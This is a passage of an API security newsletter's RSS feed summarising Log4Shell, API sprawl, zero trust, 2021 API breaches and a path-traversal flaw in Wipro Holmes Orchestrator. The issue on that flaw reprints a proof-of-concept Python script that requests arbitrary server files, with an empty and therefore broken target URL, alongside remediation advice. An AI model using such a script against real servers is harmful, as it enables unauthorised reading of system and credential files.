<p>The article provides coverage on topics such as API authentication including OAuth2 and SAML, the various protocols used by APIs, and deployment models, and a concise overview of the OWASP API Security Top 10.</p>
<p>The article concludes with some solid recommendations for best practices for API security. All in all an excellent read for anyone starting in API security.</p>
<h2>Article: Achieve speed and security by adopting Zero Trust and APIs</h2>
<p>Forbes has r<a href="https://apisecurity.io/issue-160-vulnerability-aws-api-gateway-kubernetes-api-access-hardening-guide/" target="_blank" rel="noopener noreferrer">ecently featured</a> views on API security and again this week is featured on APISecurity.io <a href="https://www.forbes.com/sites/forbestechcouncil/2021/12/16/can-enterprises-really-achieve-speed-and-security-apis-and-zero-trust-mark-a-hopeful-future/?sh=6529f7315beb" target="_blank" rel="noopener noreferrer">with an article from contributor Vince Padua</a> on how enterprises can achieve speed and security by leveraging APIs and Zero Trust.</p>
<p>Padua describes how the erosion of traditional trust boundaries has led to the wider adoption of zero trust architecture (ZTA) principles. Simultaneously APIs have become increasingly important to organizations as the means of access to critical data and assets. Unfortunately, APIs have increasingly become the target of attack due to weaknesses in implementation particularly regarding API keys and tokens.</p>
<p>Padua concludes that an approach based on ZTA concepts (such as policy decision and enforcement points) using an API gateway and using API authentication and authorization using token-based approaches offers the least privilege access and hence a risk reduction. The article provides an optimistic outlook on how to scale API security across multiple platforms and geo-distributed deployments.</p>
<h2>Bonus article: Seven ways to avoid JWT pitfalls</h2>
<p>Finally to conclude 2021<a href="https://42crunch.com/7-ways-to-avoid-jwt-pitfalls/" target="_blank" rel="noopener noreferrer"> we have a bonus contribution</a> from Dr. Phillipe de Ryck (of <a href="https://pragmaticwebsecurity.com/" target="_blank" rel="noopener noreferrer">Pragmatic Web Security</a> fame) discussing seven ways to avoid JWT pitfalls.</p>
<p>De Ryck provides an in-depth discussion with code samples for the following seven topics:</p>
<ul>
<li>Use a Static Algorithm Configuration</li>
<li>Use Explicit Typing</li>
<li>Go All Out on Metadata</li>
<li>Treat your Secrets as Secrets</li>
<li>Bring Down the Testing Hammer</li>
<li>Encapsulating Security Behavior</li>
<li>Rely on Static Code Analysis</li>
</ul>
<p>This guide should prove to be popular with developers focused on API solutions reliant on JWT tokens.</p>
<p>Finally in 2022 de Ryck will be participating in a three-part webinar series on the OWASP API Security Top 10. Make a resolution for 2022 and <a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer">book your space now</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-165-vulnerability-in-all-in-one-wordpress-plugin-why-to-treat-all-apis-as-public-a-beginners-guide-to-api-security/">Issue 165: Vulnerability in All in One WordPress plugin, why to treat all APIs as public, a beginner&#8217;s guide to API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 164: Log4Shell vulnerability, API sprawl an increasing threat, API security design best practices, Zero Trust for APIs</title>
		<link>https://apisecurity.io/issue-164-log4shell-vulnerability-api-sprawl-an-increasing-threat-api-security-design-best-practices-zero-trust-for-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 15 Dec 2021 19:11:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8898</guid>

					<description><![CDATA[<p>This week, we have news on the Log4Shell vulnerability affecting applications and infrastructure using the ubiquitous Log4j library. In addition, there&#8217;s an article on how API sprawl is becoming a threat to the digital economy, a guide on API security design best practices, and views on the benefits of zero trust approach for API security. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-164-log4shell-vulnerability-api-sprawl-an-increasing-threat-api-security-design-best-practices-zero-trust-for-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-164-log4shell-vulnerability-api-sprawl-an-increasing-threat-api-security-design-best-practices-zero-trust-for-apis/">Issue 164: Log4Shell vulnerability, API sprawl an increasing threat, API security design best practices, Zero Trust for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news on the Log4Shell vulnerability affecting applications and infrastructure using the ubiquitous <code>Log4j</code> library. In addition, there&#8217;s an article on how API sprawl is becoming a threat to the digital economy, a guide on API security design best practices, and views on the benefits of zero trust approach for API security.</p>
<h2>Vulnerability: Log4Shell vulnerability poses a critical threat to applications</h2>
<p>The <a href="https://portswigger.net/daily-swig/log4shell-vulnerability-poses-critical-threat-to-applications-using-ubiquitous-java-logging-package-apache-log4j" target="_blank" rel="noopener noreferrer">major news this week</a> is the critical vulnerability in the ubiquitous <code>Log4j</code> Java logging library. A combination of factors — including the ease of exploit (several example exploits were posted within hours of disclosure), the prevalence of the library, and the impact of the vulnerability (including complete server takeover)  — has led to the vulnerability being classified a maximum score of ten on the CVSS scale. The vulnerability has been assigned the identifier <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228" target="_blank" rel="noopener noreferrer">CVE-2021-44228</a>.</p>
<p>The affected versions of <code>Log4j</code> are <code>2.0-beta9</code> up to and including <code>2.14.1</code>. A new version <code>2.15.0</code> that addresses the issue has been released and is expected to appear on downstream servers within days. If it is not possible to upgrade the library version immediately, remediation is possible through system properties or remove the affected class from the package library. The <a href="https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228" target="_blank" rel="noopener noreferrer">Veracode remediation guidance</a> provides full details on remediation and mitigation for this vulnerability, as well as advice on identifying affected applications by using software composition analysis (SCA) techniques.</p>
<h2>Article: API sprawl becoming a threat to the digital economy</h2>
<p>F5 has written an article <a href="https://devops.com/api-sprawl-a-looming-threat-to-digital-economy/" target="_blank" rel="noopener noreferrer">&#8220;Continual API Sprawl: Challenges and Opportunities in an API Driven Economy&#8221;</a>. The article investigates the sprawl of APIs and the potential impact this has on the digital economy which is so heavily dependent on them.</p>
<p>F5 suggests that many estimates in the growth of APIs tend to be conservative  — according to F5’s aggressive calculations, we will be approaching 1.7 billion active APIs by 2030. This high growth will inevitably lead to sprawl, resulting in APIs that may not be designed, tested, or managed adequately, and that are deployed in many dispersed environments. This will clearly pose a challenge to those responsible for securing such APIs.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8908" src="https://apisecurity.io/wp-content/uploads/2021/12/Article2-1.jpg" alt="" width="605" height="307" /></p>
<p>The article cites several factors driving this sprawl:</p>
<ul>
<li><strong>Sheer growth</strong>: As APIs continue to grow, it will become increasingly challenging to manage and govern them.</li>
<li><strong>Lack of standards</strong>: A lack of common standards frequently leads to duplication of effort in creating APIs and difficulties in integration between them.</li>
<li><strong>New development approaches</strong>: The adoption of microservices is further accelerating the growth of APIs, in this case internal APIs in the so-called east—west direction.</li>
<li><strong>Continuous software development</strong>: The ability to easily deploy an API can lead to duplication of API instances, leading to maintenance challenges.</li>
<li><strong>Various computing evolutions</strong>: The drive toward a cloud operating model has led to APIs being deployed in highly divergent regions leading again to maintenance challenges.</li>
</ul>
<p>This sprawl is posing various challenges. For instance, operating or managing APIs do not necessarily scale well, making it difficult to discover or document APIs. The ubiquitous use of the OpenAPI Specification (OAS) is seen as a natural counter to this challenge. Secondly, the rapid evolution of APIs can lead to challenges in API integration, manifesting in broken client applications. This can be addressed by using a rigorous approach toward API versioning.</p>
<p>From a security perspective, the challenges of API sprawl are the most concerning — in 2020 alone, 91% of enterprises experienced an API security incident. The sprawl in APIs will lead development teams to take shortcuts in how they develop APIs, including anti-patterns like re-using authentication and authorization tokens and keys, and poor server-side API implementations.</p>
<p>Some useful mitigation tactics against the sprawl include, for example:</p>
<ul>
<li>Treat the API as a product.</li>
<li>Improve developer experience.</li>
<li>Use spec-driven development.</li>
<li>Ensure that API documentation and code libraries are up to date.</li>
<li>Use consistent endpoint naming.</li>
<li>Set clear guidelines for API versioning and deprecation.</li>
<li>Go beyond API keys with OAuth and OpenID Connect.</li>
</ul>
<h2>Article: API security design best practices</h2>
<p>For readers with a focus on the implementation of API backend, we have <a href="https://habr.com/en/post/595075/" target="_blank" rel="noopener noreferrer">a thorough article by Yuri Kopylovski on various considerations related to security best practices</a>.</p>
<p>The guide covers topics like, for example:</p>
<ul>
<li>API traffic flow</li>
<li>Timeouts</li>
<li>Error handling</li>
<li>Logging strategies</li>
<li>Platform-specific considerations</li>
</ul>
<p>It concludes with some anti-patterns specific to session management and API gateway implementations to watch out for in terms of API security.</p>
<h2>Article: The benefits of zero trust for API security</h2>
<p>We have <a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/" target="_blank" rel="noopener noreferrer">previously featured</a> perspectives on zero trust in respect of API security, and this week we have <a href="https://www.cm-alliance.com/cybersecurity-blog/benefits-of-adopting-zero-trust-for-api-security" target="_blank" rel="noopener noreferrer">David Bisson&#8217;s views on the benefits of zero trust for API security</a>.</p>
<p>The key takeaways from the perspective of API security include the following:</p>
<ul>
<li>Infosec teams can leverage zero trust to scale their API governance, ensuring a balance between compliance and enabling new API development.</li>
<li>Assuming that traditional network boundaries have been eliminated and not relying on network perimeters as a security control are crucial.</li>
<li>The key principle is to deny everything by default and authenticate every resource.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-164-log4shell-vulnerability-api-sprawl-an-increasing-threat-api-security-design-best-practices-zero-trust-for-apis/">Issue 164: Log4Shell vulnerability, API sprawl an increasing threat, API security design best practices, Zero Trust for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 163: Why API security strategies fail, AWS keynote on good API design, biggest breaches in 2021</title>
		<link>https://apisecurity.io/issue-163-why-api-security-strategies-fail-aws-keynote-on-good-api-design-biggest-breaches-in-2021/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 08 Dec 2021 20:25:59 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8876</guid>

					<description><![CDATA[<p>This week, we have an article on seven reasons why API security strategies are failing, details on the recent keynote by Werner Vogels at AWS re:Invent on six rules for good API design, an article by Cisco on API discovery, and a review of some of the biggest API security attacks in 2021. Article: Seven [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-163-why-api-security-strategies-fail-aws-keynote-on-good-api-design-biggest-breaches-in-2021/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-163-why-api-security-strategies-fail-aws-keynote-on-good-api-design-biggest-breaches-in-2021/">Issue 163: Why API security strategies fail, AWS keynote on good API design, biggest breaches in 2021</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article on seven reasons why API security strategies are failing, details on the recent keynote by Werner Vogels at AWS re:Invent on six rules for good API design, an article by Cisco on API discovery, and a review of some of the biggest API security attacks in 2021.</p>
<h2>Article: Seven reasons your API security strategy is failing</h2>
<p>This week, AmazicWorld featured <a href="https://amazicworld.com/7-reasons-your-api-security-strategy-is-failing-how-to-fix-it/" target="_blank" rel="noopener noreferrer">a review of why API security strategies are failing to have the desired effect.</a> The author&#8217;s view is that whilst developers are well-versed in how to create APIs, security risks that APIs pose are an increasing threat to organizations. These risks are in large part a consequence of rapid API adoption: the sprawl of APIs is widening the threat landscape, and the fact that APIs are well-documented and can be easily reverse-engineered enables attackers to take advantage of them.</p>
<p>The report identified seven top reasons why API security strategies are failing as follows:</p>
<ul>
<li><strong>Limited exposure to APIs</strong>: Many APIs are developed by teams more familiar with other programming paradigms (such as UI or backend) and who are not familiar with the intricacies of API development, particularly security.</li>
<li><strong>Lack of visibility:</strong> The lack of a comprehensive API inventory is a recurring topic in this newsletter — you can&#8217;t secure what you can&#8217;t see!</li>
<li><strong>The growing threat of API attacks:</strong> The increasing growth of APIs has led to rapidly expanding attack surface, making defense increasingly challenging.</li>
<li><strong>Implementation of traditional security practices</strong>: Another topic that <a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">I, too, keep returning to</a> is the use of legacy security tools, such as WAFs and API gateways, which are simply not capable of providing appropriate API security controls.</li>
<li><strong>Improper security ownership structure</strong>: Some organizations suffer from a lack of ownership and accountability regarding API security.</li>
<li><strong>Putting the onus of API security on the developer</strong>: Developers are increasingly pushed to address API security issues and often do not have adequate time or appropriate tooling for it.</li>
<li><strong>Rushing to market</strong>: Development teams are frequently under pressure to release new features and functionalities, leading to compromises in the security of the related APIs.</li>
</ul>
<p>There are no easy solutions to many of the topics addressed — the best advice would be to start with gathering a comprehensive API inventory and upskilling the development teams.</p>
<h2>Opinion: Werner Vogels on good API design</h2>
<p>Last week saw the annual AWS re:Invent conference, during which the AWS CTO Werner Vogels gave prominent focus to the importance of good API design, <a href="https://thenewstack.io/werner-vogels-6-rules-for-good-api-design/" target="_blank" rel="noopener noreferrer">as covered by the NewStack</a>. The talk also highlighted a new AWS offering called Cloud Control API, which acts as a unified control for API resources not only on AWS but also from 3rd-party providers.</p>
<p>Of interest to API practitioners are the six best API design practices identified by Vogels:</p>
<ul>
<li><strong>APIs are Forever</strong>: Beware of phantom APIs, which may still be active but are not assessed for risks or protected.</li>
<li><strong>Never Break Backward Compatibility</strong>: API versioning is key here.</li>
<li><strong>Work Backwards from Customer Use Cases</strong>: Focus on the customer&#8217;s needs rather than on what you think makes a useful API.</li>
<li><strong>Create APIs That are Self Describing and Have a Clear, Specific Purpose</strong>: API documentation should be clear and intuitive.</li>
<li><strong>Create APIs with Explicit and Well-Documented Failure Modes</strong>: Ensure users can understand what can go wrong.</li>
<li><strong>Avoid Leaking Implementation Details at All Costs</strong>: Avoid leaking implementation details to minimize coupling to specific technologies and, of course, to avoid security concerns.</li>
</ul>
<p>Many of these are self-evident to readers of this newsletter, but it&#8217;s nonetheless encouraging to see APIs receiving prominence on the big stage.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8881" src="https://apisecurity.io/wp-content/uploads/2021/12/Article2.jpg" alt="" width="652" height="339" /></p>
<h2>Article: APIs are not known well enough</h2>
<p>In our <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/" target="_blank" rel="noopener noreferrer">issue 155</a>, we covered the new APIClarity product being developed as a <a href="https://42crunch.com/42crunch-and-cisco-collaborate-to-drive-api-security-forward-and-to-increase-cloud-protection/" target="_blank" rel="noopener noreferrer">joint collaboration</a> between Cisco, 42Crunch, and API Metrics. This week, Techrepublic featured the views of <a href="https://www.techrepublic.com/article/how-well-do-you-know-your-apis-not-well-enough-says-cisco/" target="_blank" rel="noopener noreferrer">Cisco&#8217;s Vijoy Pandey on the challenges faced by organizations in being able to comprehensively produce an inventory of their API estate</a>. A key takeaway from Pandey is this view on the importance of the OpenAPI Specification (OAS):</p>
<blockquote class="blockquote"><p><em>&#8220;Once you have an OpenAPI spec, you can see what an API is actually transmitting, versus what it was originally intended to do. Say you intended it to pass an integer, but over time people started sending flops. Or you intended two arguments, but over time people started passing three or four, and the API spec hasn&#8217;t been updated. These are clear attack vectors,&#8221;</em></p></blockquote>
<p>From a security perspective, Pandey suggests the following three best practices:</p>
<ul>
<li>Leverage the community of security experts in the OWASP organization, such as their excellent <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10</a>.</li>
<li>Focus on the security of your software supply chain using a bill of materials to ensure provenance and governance.</li>
<li>Consider health indicators of an API — like uptimes or hosting location — when determining if an API is reliable and safe.</li>
</ul>
<h2>Article: Biggest API security attacks in 2021</h2>
<p>As we head toward the end of 2021, it is time to look back over some of the biggest API security attacks of 2021 — <a href="https://securityboulevard.com/2021/11/biggest-api-security-attacks-of-2021-so-far/" target="_blank" rel="noopener noreferrer">this week we feature</a> Security Boulevard&#8217;s summary of some of the biggest attacks.</p>
<p>First up is the Parler API hack in January (featured in our <a href="https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/" target="_blank" rel="noopener noreferrer">issue 116</a>), in which over 60 terabytes of data was leaked affecting 10 million users. Another big one followed in April with the Clubhouse leak (our <a href="https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/" target="_blank" rel="noopener noreferrer">issue 129</a>), where over 1.3 million records were leaked. In July, the LinkedIn API breach ( <a href="https://apisecurity.io/issue-140-api-vulnerabilities-lazypay-western-digital-linkedin-idor-mindmap/" target="_blank" rel="noopener noreferrer">issue 140</a>) affected 700 million users and was attributed to inadequate API security practices. Last on Security Boulevard&#8217;s list is the NoxPlayer API hack, which we covered in our <a href="https://apisecurity.io/issue-119-noxplayer-supply-chain-attack-hacked-api/" target="_blank" rel="noopener noreferrer">issue 119</a>.</p>
<p>The key takeaway clearly is that API security is likely to be an ever-increasing concern as API adoption continues to burgeon and attackers focus their efforts on this seemingly vulnerable target.</p>
<p>The post <a href="https://apisecurity.io/issue-163-why-api-security-strategies-fail-aws-keynote-on-good-api-design-biggest-breaches-in-2021/">Issue 163: Why API security strategies fail, AWS keynote on good API design, biggest breaches in 2021</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 162: Compromised Google Cloud accounts, GraphQL as API gateway, API security guide and training</title>
		<link>https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Dec 2021 19:19:01 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8844</guid>

					<description><![CDATA[<p>This week, we have details of compromised Google Cloud accounts being used to mine cryptocurrency (mainly with weak or no passwords on API connections), there&#8217;s an article on how GraphQL can be used as an API gateway (including security controls), a very comprehensive guide to all things relating to API security, and a new API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/">Issue 162: Compromised Google Cloud accounts, GraphQL as API gateway, API security guide and training</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details of compromised Google Cloud accounts being used to mine cryptocurrency (mainly with weak or no passwords on API connections), there&#8217;s an article on how GraphQL can be used as an API gateway (including security controls), a very comprehensive guide to all things relating to API security, and a new API security training course from AppSecEngineer.</p>
<h2>Vulnerability: Compromised Google Cloud accounts used to mine cryptocurrency</h2>
<p>The main story this week comes from HackerNews and describes <a href="https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html" target="_blank" rel="noopener noreferrer">how attackers are able to exploit improperly secured Google Cloud Platform (GCP) tenants</a>. The impact on affected users included compromising their cloud resources, like uploading cryptocurrency mining software, and ransomware and phishing attacks.</p>
<p>Of greatest concern is that the accounts could be compromised due to lack of basic hygiene on the cloud tenants. The most common issue as well as exploit — affecting 48% of the instances — was weak or no password on user accounts and API connections that allowed attacker easy access to the cloud instances. Other exploits included installing third-party software in the cloud instances and leaking credentials through GitHub repositories.</p>
<p>The key takeaway here is that whilst cloud platforms are a great business enabler, their complexity frequently leads to misconfiguration which results in potentially vulnerable deployments. Additionally, many skilled attackers will know what the common misconfigurations are and home in on them, allowing them to easily exploit them in the attacks on systems.</p>
<h2>Article: GraphQL as an API gateway</h2>
<p>An interesting article this week by Tj Blogumas describes <a href="https://levelup.gitconnected.com/graphql-is-the-new-api-gateway-383edeed4bcd" target="_blank" rel="noopener noreferrer">a novel approach to using GraphQL as an API gateway</a>.</p>
<p>Blogumas describes a typical design problem encountered in the adoption of a microservices architecture: how to present a single fronted to consumers without exposing the complexity of the backing microservices mesh. Traditionally, this has been the domain of the API gateways, but Blogumas demonstrates how a GraphQL frontend can achieve the same effect.</p>
<p>Of interest here is how you can implement security controls at the GraphQL gateway level rather than in the backing microservice APIs. The key advantage to this approach is that key security controls are centralized in one place — implemented only once at the gateway level, rather than at in individual APIs. This reduces the burden on development teams and reduces the likelihood that such controls get accidentally omitted.</p>
<p>Blogumas provides several examples of the type of security controls that can be implemented, such as:</p>
<ul>
<li><strong>Depth limiting</strong>: Reduce the depth of allowed queries to reduce the impact of Denial of Service (DoS) based attacks.</li>
<li><strong>Rate limiting</strong>: Reduce the rate at which requests can be made to specific API endpoints to mitigate the effect of DoS or brute force attacks.</li>
<li><strong>Query cost limitations</strong>: Reduce excessively complex queries to mitigate DoS attacks.</li>
</ul>
<p>An interesting take on API architecture that we will surely hear more about.</p>
<h2>Guide: &#8220;Awesome API security&#8221; guide</h2>
<p>We have featured some excellent API security guides in this newsletter (such as <a href="https://apisecurity.io/issue-161-vulnerability-in-wipro-holmes-orchestrator-report-into-vulnerabilities-in-fintech-and-banking-apps/" target="_blank" rel="noopener noreferrer">the one last week</a> by Inon Shkedy), and this week it is the turn of the &#8220;<a href="https://github.com/arainho/awesome-api-security" target="_blank" rel="noopener noreferrer">Awesome API security</a>&#8221; guide by André Rainho.</p>
<p>This vastly comprehensive guide covers, for example, the following topics:</p>
<ul>
<li>Tools</li>
<li>Mind mapping</li>
<li>Checklists and cheatsheets</li>
<li>Training, walkthroughs, and laboratories</li>
<li>Enumeration and scanning</li>
<li>Fuzzing and API keys</li>
<li>Firewalls</li>
<li>Presentations, videos, playlists, and podcasts</li>
<li>Design and architecture</li>
<li>Specifications</li>
</ul>
<p>This is bound to prove an invaluable resource for anyone working in or around API security — thanks to André for this great resource!</p>
<h2>Training: AppSecEngineer&#8217;s 2021 guide to API security</h2>
<p>Finally for this week, <a href="https://appsecengineer.com/hackerman-hub/2021-guide-api-security-what-you-need-know" target="_blank" rel="noopener noreferrer">we have news</a> of upcoming API security training courses by the AppSecEngineer team, featured in their review of API security in 2021.</p>
<p>The course includes a deep dive into both offensive and defensive techniques for API developers. On offense, it covers typical vulnerabilities specific to REST APIs and how malicious actors can exploit them. On defense, it focuses on defensive techniques in a hands-on laboratory environment that follows the OWASP API Security Top 10 as a content outline.</p>
<p>It&#8217;s always good to see new API security training and — based on previous AppSecEngineer courses — this should prove to be a great success.</p>
<p>The post <a href="https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/">Issue 162: Compromised Google Cloud accounts, GraphQL as API gateway, API security guide and training</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webinar: Automate API Protection with “Security as Code”</title>
		<link>https://apisecurity.io/webinar-automate-api-protection-security-code/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Tue, 30 Nov 2021 17:53:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8850</guid>

					<description><![CDATA[<p>Thursday December 9th, 2021  &#124; 8am PDT / 11am EST / 4pm GMT Join Colin Domoney as he demonstrates how DevSecOps teams now automate and scale the protection of your APIs by generating “security as code” into a CI/CD pipeline.  More information [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/webinar-automate-api-protection-security-code/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/webinar-automate-api-protection-security-code/">Webinar: Automate API Protection with “Security as Code”</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-8847" src="https://apisecurity.io/wp-content/uploads/2021/11/Banners_Webinar_AutomateAPI_Colin-03.png" alt="" width="951" height="91" /></p>
<p>Thursday December 9th, 2021  | 8am PDT / 11am EST / 4pm GMT</p>
<p>Join Colin Domoney as he demonstrates how DevSecOps teams now automate and scale the protection of your APIs by generating “security as code” into a CI/CD pipeline.  <a href="https://apisecurity.io/events/webinar-automate-api-protection-security-code/">More information</a></p>
<p>The post <a href="https://apisecurity.io/webinar-automate-api-protection-security-code/">Webinar: Automate API Protection with “Security as Code”</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 161: Vulnerability in Wipro Holmes Orchestrator, report into vulnerabilities in FinTech and banking apps</title>
		<link>https://apisecurity.io/issue-161-vulnerability-in-wipro-holmes-orchestrator-report-into-vulnerabilities-in-fintech-and-banking-apps/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 24 Nov 2021 18:31:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8798</guid>

					<description><![CDATA[<p>This week, we have details of a vulnerability in the AI platform Wipro Holmes Orchestrator, allowing the download of arbitrary files via path manipulation. There&#8217;s also a new report from researcher Alissa Knight on vulnerabilities in banking, cryptocurrency exchange, and FinTech APIs; an article on the impact of a shift-left approach for API security; and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-161-vulnerability-in-wipro-holmes-orchestrator-report-into-vulnerabilities-in-fintech-and-banking-apps/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-161-vulnerability-in-wipro-holmes-orchestrator-report-into-vulnerabilities-in-fintech-and-banking-apps/">Issue 161: Vulnerability in Wipro Holmes Orchestrator, report into vulnerabilities in FinTech and banking apps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details of a vulnerability in the AI platform Wipro Holmes Orchestrator, allowing the download of arbitrary files via path manipulation. There&#8217;s also a new report from researcher Alissa Knight on vulnerabilities in banking, cryptocurrency exchange, and FinTech APIs; an article on the impact of a shift-left approach for API security; and 31 tips for improving API security; and an upcoming webinar on automating API protection.</p>
<h2>Vulnerability: Arbitrary file download in Wipro Holmes Orchestrator</h2>
<p>This week saw the disclosure of a vulnerability hat affected the AI platform Wipro Holmes Orchestrator, as detailed in <a href="https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html" target="_blank" rel="noopener noreferrer">this disclosure</a> and tracked as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38146" target="_blank" rel="noopener noreferrer">CVE-2021-38146</a>.</p>
<p>The vulnerability was discovered by researcher Rizal Muhammed, who provided a sample Python script to demonstrate the exploit. It is a relatively simple one, but allows an attacker to download arbitrary files from the target by manipulating the request parameter to the API call, as shown below: the request body field <code>SearchString</code> is a user-supplied value that specifies the target file to be downloaded.</p>
<pre class="line-numbers" data-line="9" data-start="1"><code class="language-markup">import requests as rq
import argparse

port = 8001    # change port if application is running on different port

def file_download(host, filepath):
  vuln_url = "" % (host, port)
  data = {
    "SearchString": filepath,
    "Msg": ""
  }

  hdr = {
    "content-type": "application/json"
  }

  resp = rq.post(vuln_url, headers=hdr, json=data)

  print resp.text

def main():
  parser = argparse.ArgumentParser(
      description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",
      epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"
    )
  parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)
  parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")
  args = parser.parse_args()

  if "\\" in args.file_path:
    fp = args.file_path.replace("\\", "/")
  else:
    fp = args.file_path
  file_download(args.target_ip, fp)

if __name__ == "__main__":
  main()</code></pre>
<p>Unfortunately, the target system did not restrict the paths provided by limiting them to a fixed location, which allowed attackers to provide any arbitrary path.</p>
<p>The key takeaway here — as ever — is <em>never trust user-supplied input</em>, like the file path in this case. Always use the well-understood and tested patterns for protecting against path traversal. Typically, any relative path specifiers in the path provided would be stripped away, and the remaining path anchored to a known directory, as described by PortSwigger in <a href="https://portswigger.net/web-security/file-path-traversal" target="_blank" rel="noopener noreferrer">their article on file path traversal</a>.</p>
<h2>Report: Vulnerabilities in banking and fintech APIs</h2>
<p>Security researcher Alissa Knight has recently <a href="https://www.businesswire.com/news/home/20211026006184/en/New-Research-Shows-Vulnerabilities-in-Banking-Cryptocurrency-Exchange-and-FinTech-APIs-Allow-Unauthorized-Transactions-and-PIN-Code-Changes-of-Customers" target="_blank" rel="noopener noreferrer">released a new research report</a>, “Scorched Earth: Hacking Bank APIs”. In the report, she details vulnerabilities in banking, cryptocurrency exchange, and fintech industries.</p>
<p>In her research, Knight was able to access 55 banks through their APIs, and change customers&#8217; PIN codes and move money between their accounts. The vulnerabilities she discovered included:</p>
<ul>
<li>Hardcoded API keys and tokens including usernames and passwords</li>
<li>Vulnerability to woman-in-the-middle (WITM) attacks</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a> vulnerabilities in nearly all the APIs tested</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a> vulnerabilities</li>
<li>Systems issues with outsourcing of development to third parties</li>
</ul>
<p>From my perspective, the key takeaway here is captured perfectly by Knight:</p>
<blockquote><p><em>&#8220;It’s clear based on my findings where authentication and authorization are very much broken, that there is no<strong> ‘trust but verify’</strong> happening with these third-party developers.”</em></p></blockquote>
<h2>Opinion: What does a shift-left approach mean for API security?</h2>
